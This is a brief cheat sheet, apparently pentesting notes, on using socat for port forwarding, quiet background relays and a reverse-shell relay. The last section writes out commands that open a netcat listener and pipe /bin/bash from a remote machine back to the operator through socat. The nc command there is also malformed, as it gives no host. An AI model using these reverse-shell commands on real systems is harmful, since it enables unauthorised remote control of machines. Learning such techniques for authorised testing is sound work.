Port Forwarding with Socat

Socat is a multipurpose relay tool. It can be used to port forwarding.

- [how-to-setup-ssh-tunneling](https://linuxize.com/post/how-to-setup-ssh-tunneling/)

Port Forwarding

Run the following command in local machine.

socat tcp-listen:8080,fork tcp:<remote-ip>:80

With command above, we can access to http://localhost:8080/ and get the content of the remote website.

Port Forwarding (from Remote Machine)

Run the following command in remote machine.

socat tcp-listen:1234,fork,reuseaddr tcp:localhost:8080

With command above, we can access to http://<remote-ip>:1234 in local machine, and get the content of the remote 8080 port.

Quiet Port Forwarding

1. Open Up Two Ports in Local Machine

socat tcp-listen:<local-port> tcp-listen:<remote-port>,fork,reuseaddr &

2. Make a Connection between Local Port and Remote Port

In remote machine,

socat tcp:<local-ip>:<local-port> tcp:<remote-ip>:<remote-port>,fork &

3. Confirmation in Your Local Machine

For example, if <remote-port> is 8000 (HTTP), we can access to localhost:<remote-port>.

4. Stop Port Forwarding

# Stop backgrounds
# kill %<NUMBER>
kill %1

Reverse Shell Relay

1. Open Listener in Your Local Machine

nc -lvnp <local-port>

2. Run Socat in Remote Machine

./socat tcp-l:8000 tcp:<local-ip>:<local-port> &
nc 8000 -e /bin/bash

3. Confirmation in Your Local Machine

You can connect the remote shell, confirm by some commands.


4. Stop Reverse Shell Relay

# Stop backgrounds
# kill %<NUMBER>
kill %1